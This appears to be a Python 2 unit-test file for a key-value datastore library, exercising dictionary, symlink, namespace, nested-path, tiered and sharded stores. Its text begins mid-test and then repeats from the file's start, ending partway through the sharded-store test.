self.assertEqual(dds_query(), [3, lva])
# deleting link should not affect source
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [3])
self.assertEqual(dds_query(), [3])
# linking should bring back to normal
sds.link(a, b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
self.assertEqual(dds_query(), [3, lva])
# Adding another link should not affect things.
sds.link(a, c)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lva)
self.assertEqual(sds_query(), [3, 3, 3])
self.assertEqual(dds_query(), [3, lva, lva])
# linking should be transitive
sds.link(b, c)
sds.link(c, d)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(d), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(sds.get(a), sds.get(d))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lvb)
self.assertEqual(dds.get(d), lvc)
self.assertEqual(sds_query(), [3, 3, 3, 3])
self.assertEqual(set(dds_query()), set([3, lva, lvb, lvc]))
self.assertRaises(AssertionError, sds.link, d, a)
def test_symlink_recursive(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds1 = SymlinkDatastore(dds)
sds2 = SymlinkDatastore(sds1)
a = Key('/A')
b = Key('/B')
sds2.put(a, 1)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.put(b, 2)
self.assertEqual(sds2.get(a), 2)
self.assertEqual(sds2.get(b), 2)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.delete(a)
self.assertEqual(sds2.get(a), None)
self.assertEqual(sds2.get(b), None)
self.assertEqual(sds2.get(b), sds2.get(a))
sds2.put(a, 3)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), 3)
self.assertEqual(sds2.get(b), sds2.get(a))
sds2.delete(b)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
class TestDirectoryDatastore(TestDatastore):
def test_simple(self):
from ..basic import DirectoryDatastore
s1 = DirectoryDatastore(DictDatastore())
s2 = DirectoryDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestDatastoreCollection(TestDatastore):
def test_tiered(self):
from ..basic import TieredDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
ts = TieredDatastore([s1, s2, s3])
k1 = Key('1')
k2 = Key('2')
k3 = Key('3')
s1.put(k1, '1')
s2.put(k2, '2')
s3.put(k3, '3')
self.assertTrue(s1.contains(k1))
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertTrue(ts.contains(k1))
self.assertEqual(ts.get(k1), '1')
self.assertEqual(s1.get(k1), '1')
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertFalse(s1.contains(k2))
self.assertTrue(s2.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertTrue(ts.contains(k2))
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s1.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertEqual(ts.get(k2), '2')
self.assertEqual(s1.get(k2), '2')
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s3.contains(k2))
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertTrue(s3.contains(k3))
self.assertTrue(ts.contains(k3))
self.assertEqual(s3.get(k3), '3')
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertEqual(ts.get(k3), '3')
self.assertEqual(s1.get(k3), '3')
self.assertEqual(s2.get(k3), '3')
self.assertEqual(s3.get(k3), '3')
ts.delete(k1)
ts.delete(k2)
ts.delete(k3)
self.assertFalse(ts.contains(k1))
self.assertFalse(ts.contains(k2))
self.assertFalse(ts.contains(k3))
self.subtest_simple([ts])
def test_sharded(self, numelems=1000):
from ..basic import ShardedDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
s4 = DictDatastore()
s5 = DictDatastore()
stores = [s1, s2, s3, s4, s5]
hash = lambda key: int(key.name) * len(stores) / numelems
sharded = ShardedDatastore(stores, shardingfn=hash)
sumlens = lambda stores: sum(map(lambda s: len(s), stores))
def checkFor(key, value, sharded, shard=None):
correct_shard = sharded._stores[hash(key) % len(sharded._stores)]
for s in sharded._stores:
if shard and s == shard:
self.assertTrue(s.contains(key))
self.assertEqual(s.get(key), value)
else:
self.assertFalse(s.contains(key))
if correct_shard == shard:
self.assertTrue(sharded.contains(key))
self.assertEqual(sharded.get(key), value)
else:
self.assertFalse(sharded.contains(key))
self.assertEqual(sumlens(stores), 0)
# test all correct.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for i in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
shard.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
sharded.put(key, value)
checkFor(key, value, sharded, shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
shard = stores[hash(key) % len(stores)]
checkFor(key, value, sharded, shard)
if value % 2 == 0:
shard.delete(key)
else:
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
# try out adding it to the wrong shards.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# ensure its in the same spots.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
incorrect_shard.put(key, value)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# this wont do anything
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.delete(key)
checkFor(key, value, sharded, incorrect_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
incorrect_shard = stores[(hash(key) + 1) % len(stores)]
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, incorrect_shard)
sharded.put(key, value)
incorrect_shard.delete(key)
checkFor(key, value, sharded, correct_shard)
self.assertEqual(sumlens(stores), numelems)
# this will place it correctly.
for value in range(0, numelems):
key = Key('/fdasfdfdsafdsafdsa/%d' % value)
correct_shard = stores[(hash(key)) % len(stores)]
checkFor(key, value, sharded, correct_shard)
sharded.delete(key)
checkFor(key, value, sharded)
self.assertEqual(sumlens(stores), 0)
self.subtest_simple([sharded])
if __name__ == '__main__':
unittest.main()
| import unittest
import logging
from ..basic import DictDatastore
from ..key import Key
from ..query import Query
class TestDatastore(unittest.TestCase):
def subtest_simple(self, stores, numelems=1000):
def checkLength(len):
try:
for sn in stores:
self.assertEqual(len(sn), numelems)
except TypeError, e:
pass
self.assertTrue(len(stores) > 0)
pkey = Key('/dfadasfdsafdas/')
checkLength(0)
# ensure removing non-existent keys is ok.
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
# insert numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertFalse(sn.contains(key))
sn.put(key, value)
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
# reassure they're all there.
checkLength(numelems)
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
self.assertEqual(sn.get(key), value)
checkLength(numelems)
k = pkey
n = int(numelems)
allitems = list(range(0, n))
def test_query(query, slice):
for sn in stores:
try:
contents = list(sn.query(Query(pkey)))
expected = contents[slice]
result = list(sn.query(query))
# make sure everything is there.
self.assertTrue(len(contents) == len(allitems),\
'%s == %s' % (str(contents), str(allitems)))
self.assertTrue(all([val in contents for val in allitems]))
self.assertTrue(len(result) == len(expected),\
'%s == %s' % (str(result), str(expected)))
self.assertTrue(all([val in result for val in expected]))
#TODO: should order be preserved?
# self.assertEqual(result, expected)
except NotImplementedError:
print 'WARNING: %s does not implement query.' % sn
test_query(Query(k), slice(0, n))
test_query(Query(k, limit=n), slice(0, n))
test_query(Query(k, limit=n/2), slice(0, n/2))
test_query(Query(k, offset=n/2), slice(n/2, n))
test_query(Query(k, offset=n/3, limit=n/3), slice(n/3, 2*(n/3)))
del k
del n
# change numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.put(key, value + 1)
self.assertTrue(sn.contains(key))
self.assertNotEqual(value, sn.get(key))
self.assertEqual(value + 1, sn.get(key))
checkLength(numelems)
# remove numelems elems
for value in range(0, numelems):
key = pkey.child(value)
for sn in stores:
self.assertTrue(sn.contains(key))
sn.delete(key)
self.assertFalse(sn.contains(key))
checkLength(0)
class TestNullDatastore(unittest.TestCase):
def test_null(self):
from ..basic import NullDatastore
s = NullDatastore()
for c in range(1, 20):
c = str(c)
k = Key(c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
s.put(k, c)
self.assertFalse(s.contains(k))
self.assertEqual(s.get(k), None)
for item in s.query(Query(Key('/'))):
raise Exception('Should not have found anything.')
class TestDictionaryDatastore(TestDatastore):
def test_dictionary(self):
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
stores = [s1, s2, s3]
self.subtest_simple(stores)
class TestCacheShimDatastore(TestDatastore):
def test_simple(self):
from ..basic import CacheShimDatastore
from ..basic import NullDatastore
class NullMinusQueryDatastore(NullDatastore):
def query(self, query):
raise NotImplementedError
# make sure the cache is used
s1 = CacheShimDatastore(NullMinusQueryDatastore(), cache=DictDatastore())
# make sure the cache is not relief upon
s2 = CacheShimDatastore(DictDatastore(), cache=NullDatastore())
# make sure the cache works in tandem
s3 = CacheShimDatastore(DictDatastore(), cache=DictDatastore())
self.subtest_simple([s1, s2, s3])
class TestLoggingDatastore(TestDatastore):
def test_simple(self):
from ..basic import LoggingDatastore
class NullLogger(logging.getLoggerClass()):
def debug(self, *args, **kwargs): pass
def info(self, *args, **kwargs): pass
def warning(self, *args, **kwargs): pass
def error(self, *args, **kwargs): pass
def critical(self, *args, **kwargs): pass
s1 = LoggingDatastore(DictDatastore(), logger=NullLogger('null'))
s2 = LoggingDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestKeyTransformDatastore(TestDatastore):
def test_simple(self):
from ..basic import KeyTransformDatastore
s1 = KeyTransformDatastore(DictDatastore())
s2 = KeyTransformDatastore(DictDatastore())
s3 = KeyTransformDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_reverse_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return key.reverse
ds = DictDatastore()
kt = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('/a/b/c')
k2 = Key('/c/b/a')
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
ds.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertEqual(kt.get(k2), 'abc')
kt.put(k1, 'abc')
self.assertEqual(ds.get(k1), 'abc')
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertEqual(kt.get(k2), 'abc')
ds.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertEqual(ds.get(k2), 'abc')
self.assertEqual(kt.get(k1), 'abc')
self.assertFalse(kt.contains(k2))
kt.delete(k1)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(kt.contains(k1))
self.assertFalse(kt.contains(k2))
def test_lowercase_transform(self):
from ..basic import KeyTransformDatastore
def transform(key):
return Key(str(key).lower())
ds = DictDatastore()
lds = KeyTransformDatastore(ds, keytransform=transform)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestLowercaseKeyDatastore(TestDatastore):
def test_simple(self):
from ..basic import LowercaseKeyDatastore
s1 = LowercaseKeyDatastore(DictDatastore())
s2 = LowercaseKeyDatastore(DictDatastore())
s3 = LowercaseKeyDatastore(DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_lowercase(self):
from ..basic import LowercaseKeyDatastore
ds = DictDatastore()
lds = LowercaseKeyDatastore(ds)
k1 = Key('hello')
k2 = Key('HELLO')
k3 = Key('HeLlo')
ds.put(k1, 'world')
ds.put(k2, 'WORLD')
self.assertEqual(ds.get(k1), 'world')
self.assertEqual(ds.get(k2), 'WORLD')
self.assertFalse(ds.contains(k3))
self.assertEqual(lds.get(k1), 'world')
self.assertEqual(lds.get(k2), 'world')
self.assertEqual(lds.get(k3), 'world')
def test(key, val):
lds.put(key, val)
self.assertEqual(lds.get(k1), val)
self.assertEqual(lds.get(k2), val)
self.assertEqual(lds.get(k3), val)
test(k1, 'a')
test(k2, 'b')
test(k3, 'c')
class TestNamespaceDatastore(TestDatastore):
def test_simple(self):
from ..basic import NamespaceDatastore
s1 = NamespaceDatastore(Key('a'), DictDatastore())
s2 = NamespaceDatastore(Key('b'), DictDatastore())
s3 = NamespaceDatastore(Key('c'), DictDatastore())
stores = [s1, s2, s3]
self.subtest_simple(stores)
def test_namespace(self):
from ..basic import NamespaceDatastore
k1 = Key('/c/d')
k2 = Key('/a/b')
k3 = Key('/a/b/c/d')
ds = DictDatastore()
nd = NamespaceDatastore(k2, ds)
ds.put(k1, 'cd')
ds.put(k3, 'abcd')
self.assertEqual(ds.get(k1), 'cd')
self.assertFalse(ds.contains(k2))
self.assertEqual(ds.get(k3), 'abcd')
self.assertEqual(nd.get(k1), 'abcd')
self.assertFalse(nd.contains(k2))
self.assertFalse(nd.contains(k3))
def test(key, val):
nd.put(key, val)
self.assertEqual(nd.get(key), val)
self.assertFalse(ds.contains(key))
self.assertFalse(nd.contains(k2.child(key)))
self.assertEqual(ds.get(k2.child(key)), val)
for i in range(0, 10):
test(Key(str(i)), 'val%d' % i)
class TestNestedPathDatastore(TestDatastore):
def test_simple(self):
from ..basic import NestedPathDatastore
s1 = NestedPathDatastore(DictDatastore())
s2 = NestedPathDatastore(DictDatastore(), depth=2)
s3 = NestedPathDatastore(DictDatastore(), length=2)
s4 = NestedPathDatastore(DictDatastore(), length=1, depth=2)
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_nested_path(self):
from ..basic import NestedPathDatastore
nested_path = NestedPathDatastore.nestedPath
def test(depth, length, expected):
nested = nested_path('abcdefghijk', depth, length)
self.assertEqual(nested, expected)
test(3, 2, 'ab/cd/ef')
test(4, 2, 'ab/cd/ef/gh')
test(3, 4, 'abcd/efgh/ijk')
test(1, 4, 'abcd')
test(3, 10, 'abcdefghij/k')
def subtest_nested_path_ds(self, **kwargs):
from ..basic import NestedPathDatastore
k1 = kwargs.pop('k1')
k2 = kwargs.pop('k2')
k3 = kwargs.pop('k3')
k4 = kwargs.pop('k4')
ds = DictDatastore()
np = NestedPathDatastore(ds, **kwargs)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
np.put(k1, k1)
np.put(k2, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
np.delete(k1)
np.delete(k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
ds.put(k3, k1)
ds.put(k4, k2)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertTrue(ds.contains(k3))
self.assertTrue(ds.contains(k4))
self.assertTrue(np.contains(k1))
self.assertTrue(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
self.assertEqual(np.get(k1), k1)
self.assertEqual(np.get(k2), k2)
self.assertEqual(ds.get(k3), k1)
self.assertEqual(ds.get(k4), k2)
ds.delete(k3)
ds.delete(k4)
self.assertFalse(ds.contains(k1))
self.assertFalse(ds.contains(k2))
self.assertFalse(ds.contains(k3))
self.assertFalse(ds.contains(k4))
self.assertFalse(np.contains(k1))
self.assertFalse(np.contains(k2))
self.assertFalse(np.contains(k3))
self.assertFalse(np.contains(k4))
def test_3_2(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/<KEY>')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 3
opts['length'] = 2
self.subtest_nested_path_ds(**opts)
def test_5_3(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/<KEY>')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 5
opts['length'] = 3
self.subtest_nested_path_ds(**opts)
def test_keyfn(self):
opts = {}
opts['k1'] = Key('/<KEY>')
opts['k2'] = Key('/<KEY>')
opts['k3'] = Key('/kj/ih/gf/abcdefghijk')
opts['k4'] = Key('/<KEY>')
opts['depth'] = 3
opts['length'] = 2
opts['keyfn'] = lambda key: key.name[::-1]
self.subtest_nested_path_ds(**opts)
class TestSymlinkDatastore(TestDatastore):
def test_simple(self):
from ..basic import SymlinkDatastore
s1 = SymlinkDatastore(DictDatastore())
s2 = SymlinkDatastore(DictDatastore())
s3 = SymlinkDatastore(DictDatastore())
s4 = SymlinkDatastore(DictDatastore())
stores = [s1, s2, s3, s4]
self.subtest_simple(stores)
def test_symlink_basic(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
sds.put(a, 3)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
def test_symlink_internals(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds = SymlinkDatastore(dds)
a = Key('/A')
b = Key('/B')
c = Key('/C')
d = Key('/D')
lva = sds._link_value_for_key(a)
lvb = sds._link_value_for_key(b)
lvc = sds._link_value_for_key(c)
lvd = sds._link_value_for_key(d)
# helper to check queries
sds_query = lambda: list(sds.query(Query(Key('/'))))
dds_query = lambda: list(dds.query(Query(Key('/'))))
# ensure _link_value_for_key and _link_for_value work
self.assertEqual(lva, str(a.child(sds.sentinel)))
self.assertEqual(a, sds._link_for_value(lva))
# adding a value should work like usual
sds.put(a, 1)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [1])
self.assertEqual(dds_query(), [1])
# _follow_link(sds._link_value_for_key(a)) should == get(a)
self.assertEqual(sds._follow_link(lva), 1)
self.assertEqual(list(sds._follow_link_gen([lva])), [1])
# linking keys should work
sds.link(a, b)
self.assertEqual(sds.get(a), 1)
self.assertEqual(sds.get(b), 1)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 1)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [1, 1])
self.assertEqual(dds_query(), [1, lva])
# changing link should affect source
sds.put(b, 2)
self.assertEqual(sds.get(a), 2)
self.assertEqual(sds.get(b), 2)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(dds.get(a), 2)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [2, 2])
self.assertEqual(dds_query(), [2, lva])
# deleting source should affect link
sds.delete(a)
self.assertEqual(sds.get(a), None)
self.assertEqual(sds.get(b), None)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), None)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [None])
self.assertEqual(dds_query(), [lva])
# putting back source should yield working link
sds.put(a, 3)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
self.assertEqual(dds_query(), [3, lva])
# deleting link should not affect source
sds.delete(b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), None)
self.assertNotEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), None)
self.assertEqual(sds_query(), [3])
self.assertEqual(dds_query(), [3])
# linking should bring back to normal
sds.link(a, b)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(b), sds.get(a))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(sds_query(), [3, 3])
self.assertEqual(dds_query(), [3, lva])
# Adding another link should not affect things.
sds.link(a, c)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lva)
self.assertEqual(sds_query(), [3, 3, 3])
self.assertEqual(dds_query(), [3, lva, lva])
# linking should be transitive
sds.link(b, c)
sds.link(c, d)
self.assertEqual(sds.get(a), 3)
self.assertEqual(sds.get(b), 3)
self.assertEqual(sds.get(c), 3)
self.assertEqual(sds.get(d), 3)
self.assertEqual(sds.get(a), sds.get(b))
self.assertEqual(sds.get(a), sds.get(c))
self.assertEqual(sds.get(a), sds.get(d))
self.assertEqual(dds.get(a), 3)
self.assertEqual(dds.get(b), lva)
self.assertEqual(dds.get(c), lvb)
self.assertEqual(dds.get(d), lvc)
self.assertEqual(sds_query(), [3, 3, 3, 3])
self.assertEqual(set(dds_query()), set([3, lva, lvb, lvc]))
self.assertRaises(AssertionError, sds.link, d, a)
def test_symlink_recursive(self):
from ..basic import SymlinkDatastore
dds = DictDatastore()
sds1 = SymlinkDatastore(dds)
sds2 = SymlinkDatastore(sds1)
a = Key('/A')
b = Key('/B')
sds2.put(a, 1)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.link(a, b)
self.assertEqual(sds2.get(a), 1)
self.assertEqual(sds2.get(b), 1)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.put(b, 2)
self.assertEqual(sds2.get(a), 2)
self.assertEqual(sds2.get(b), 2)
self.assertEqual(sds2.get(a), sds2.get(b))
self.assertEqual(sds1.get(a), sds1.get(b))
sds2.delete(a)
self.assertEqual(sds2.get(a), None)
self.assertEqual(sds2.get(b), None)
self.assertEqual(sds2.get(b), sds2.get(a))
sds2.put(a, 3)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), 3)
self.assertEqual(sds2.get(b), sds2.get(a))
sds2.delete(b)
self.assertEqual(sds2.get(a), 3)
self.assertEqual(sds2.get(b), None)
self.assertNotEqual(sds2.get(b), sds2.get(a))
class TestDirectoryDatastore(TestDatastore):
def test_simple(self):
from ..basic import DirectoryDatastore
s1 = DirectoryDatastore(DictDatastore())
s2 = DirectoryDatastore(DictDatastore())
self.subtest_simple([s1, s2])
class TestDatastoreCollection(TestDatastore):
def test_tiered(self):
from ..basic import TieredDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
ts = TieredDatastore([s1, s2, s3])
k1 = Key('1')
k2 = Key('2')
k3 = Key('3')
s1.put(k1, '1')
s2.put(k2, '2')
s3.put(k3, '3')
self.assertTrue(s1.contains(k1))
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertTrue(ts.contains(k1))
self.assertEqual(ts.get(k1), '1')
self.assertEqual(s1.get(k1), '1')
self.assertFalse(s2.contains(k1))
self.assertFalse(s3.contains(k1))
self.assertFalse(s1.contains(k2))
self.assertTrue(s2.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertTrue(ts.contains(k2))
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s1.contains(k2))
self.assertFalse(s3.contains(k2))
self.assertEqual(ts.get(k2), '2')
self.assertEqual(s1.get(k2), '2')
self.assertEqual(s2.get(k2), '2')
self.assertFalse(s3.contains(k2))
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertTrue(s3.contains(k3))
self.assertTrue(ts.contains(k3))
self.assertEqual(s3.get(k3), '3')
self.assertFalse(s1.contains(k3))
self.assertFalse(s2.contains(k3))
self.assertEqual(ts.get(k3), '3')
self.assertEqual(s1.get(k3), '3')
self.assertEqual(s2.get(k3), '3')
self.assertEqual(s3.get(k3), '3')
ts.delete(k1)
ts.delete(k2)
ts.delete(k3)
self.assertFalse(ts.contains(k1))
self.assertFalse(ts.contains(k2))
self.assertFalse(ts.contains(k3))
self.subtest_simple([ts])
def test_sharded(self, numelems=1000):
from ..basic import ShardedDatastore
s1 = DictDatastore()
s2 = DictDatastore()
s3 = DictDatastore()
s4 = DictDatastore()
s5 = DictDatastore()
stores = [s1, s2, s3, s4, s5]
hash = lambda key: int(key.name) * len(stores) / numelems
sharded = ShardedDatastore(stores, shardingfn=hash)
sumlens = lambda stores: sum(map(lambda s: len(s), stores))
